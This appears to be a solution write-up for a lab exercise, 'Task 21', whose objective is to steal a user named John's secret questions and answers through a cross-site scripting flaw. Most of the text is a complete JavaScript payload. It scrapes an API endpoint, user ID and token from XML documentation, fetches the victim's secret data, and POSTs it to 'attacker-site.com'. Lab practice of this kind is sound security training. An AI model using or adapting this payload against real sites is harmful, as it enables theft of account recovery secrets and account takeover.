Task 21 [Try Now]
Objectives:
- Find John's Secret Questions+Answers using an XSS vulnerability on this page
- Display the Questions+Answers in the div with id "result"
- Send the Questions+Answers to your Attack Server
- No Hardcoded values can be used - everything has to be figured out dynamically
When you will see the API documentation, it is basically in XML and as per 4th point, everything should be dynamic.
So the regex that would be used are /<endpoint>(.+?)<\/endpoint>/
, /<uid-param-value>(.+?)<\/uid-param-value>/
and /<token-param-value>(.+?)<\/token-param-value>/
let xhr = new XMLHttpRequest();
xhr.onreadystatechange = function () {
if (this.readyState == 4 && this.status == 200) {
let ep = /<endpoint>(.+?)<\/endpoint>/.exec(this.responseText)[1];
let uid = /<uid-param-value>(.+?)<\/uid-param-value>/.exec(this.responseText)[1];
let tok = /<token-param-value>(.+?)<\/token-param-value>/.exec(this.responseText)[1];
let xhr1 = new XMLHttpRequest();
xhr1.onreadystatechange = function () {
if (this.readyState == 4 && this.status == 200) {
let xhr2 = new XMLHttpRequest();
xhr2.open("POST", "http://attacker-site.com", true);
xhr2.setRequestHeader("Content-Type", "application/json");
xhr2.send(this.responseText);
}
};
xhr1.open("GET", location.origin + ep + "?uid=" + uid + "&token=" + tok, true);
xhr1.send();
}
};
xhr.open("GET", document.querySelector("a").href, true);
xhr.send();
For POC, Click Here